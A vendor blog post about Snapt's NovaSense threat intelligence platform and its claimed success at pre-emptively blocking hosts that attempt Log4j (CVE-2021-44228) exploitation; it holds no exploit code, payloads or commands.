Threat Intelligence vs Log4j

by Dave Blakey on Security • December 14, 2021 Threat Intelligence vs Log4j

As many of you will already know, the Log4j vulnerability has been making waves in the industry. We put out a post last week on how we mitigate the attack (read more on CVE-2021-44228) but something we haven't spoken about is how effective our threat intelligence platform has been at preventing the attack, and the insights from a platform like NovaSense.

NovaSense is a threat intelligence platform that lists abusers, botnets, cybercrime, and malware hosts, enabling pre-emptive defense by cyber security teams. It's powered by the Snapt Nova's AI and ML-based blocking and provides a very fast response to global threats by listing the dangerous hosts that are trying to exploit users as opposed to just the exploit itself.

We'll go into more detail soon, but NovaSense was blocking over 98% of the hosts that we have seen attempting Log4j attacks before the vulnerability was announced!

How NovaSense Learns

NovaSense receives reports of all anomalies and WAF blocks from the Nova WAF network, providing it with tens of thousands of sources of threat information and generating millions of threat signals an hour.

We can see a real example of a threat signal that was sent to NovaSense by a Nova WAF earlier today below:

NovaSense collates these massive amounts of data and feeds it all through its machine learning engine for IP reputation and threat analysis to decide on two things:

  1. Is this a threat?
  2. If so, what is the score of this threat?

What comes out the other side is a threat signal that looks like this:

This information is then used by direct clients on NovaSense, as well as embedded solutions like Nova. On the Snapt Nova WAF for example this shows up as seen below:

How This Protects You

There are many components of the NovaSense platform, but there are a few particular observations that I want to dig into.

Shared Threat Information Spreads Protection Faster

Firstly, due to the large footprint of Nova WAFs and the shared nature of threat information, as soon as Nova WAFs start reporting blocks to NovaSense, NovaSense issues threat signals enabling everyone to start blocking dangerous hosts – often within 1-2 minutes of those hosts starting to attack sites.

That means it's very likely that when an attack like this starts you are protected without knowing it as you are unlikely to be one of the first people to be attacked. Naturally, the Nova WAF blocked these requests anyway but NovaSense can also be integrated into other platforms.

Pre-Emptive Defense Targets Attackers, Not Just The Attack

Secondly, and most importantly, over 98% of hosts that are actively trying to exploit the Log4j vulnerability on our systems are already listed on NovaSense – they were identified for blocking BEFORE the vulnerability came out.

That's because these compromised or abusive systems are often involved in other attacks, are part of botnets, have sent abusive requests before, etc. And this is where threat intelligence really shines.

As we mentioned, Nova already had a pre-emptive block for remote file inclusion that covered Log4j exploits and we released a targeted one last week. But even if this vulnerability had not been identified and publicized, NovaSense was already blocking the vast majority of systems trying to exploit it.

Examples of Pre-Emptive Blocks

I've included the last two blocks we saw on one of our Nova accounts below, and as you can see they were all blocked on NovaSense. However, notice that the second example was actually blocked 7 days before the Log4j vulnerability was announced.

If you are interested in learning more about NovaSense, or the Nova platform, please reach out to us and we will be happy to discuss your needs.